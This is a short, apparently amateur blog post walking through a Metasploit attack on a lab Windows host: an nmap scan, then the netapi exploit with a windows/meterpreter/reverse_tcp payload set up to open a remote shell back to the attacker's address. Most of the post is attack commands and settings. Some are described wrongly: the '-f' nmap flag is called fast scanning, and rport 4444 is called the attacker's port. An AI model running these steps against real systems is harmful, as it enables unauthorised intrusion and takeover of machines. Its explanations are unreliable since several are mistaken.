The first, I scan the network using nmap to find the open ports
type the command : nmap -f 192.168.56.101
-f is a fast-scanning that nmap will scan as soon as possible ...
And then, open the metasploit on start menu or via terminal, here i'm using terminal
type the command : root@bt:~# msfconsole
wait a moment's, usually a bit longer..
Now search the netapi
Now set lhost 192.168.56.1 (Our IP address)
rhost 192.168.56.101 (IP address of the target)
rport 4444 (PORT on backtrack)
PAYLOAD windows/meterpreter/reverse_tcp
then start exploit
Finish, we can do anything.. but i do not do anything, because just it that i know.. maybe the next meeting i got more than this.. thanks
No comments:
Post a Comment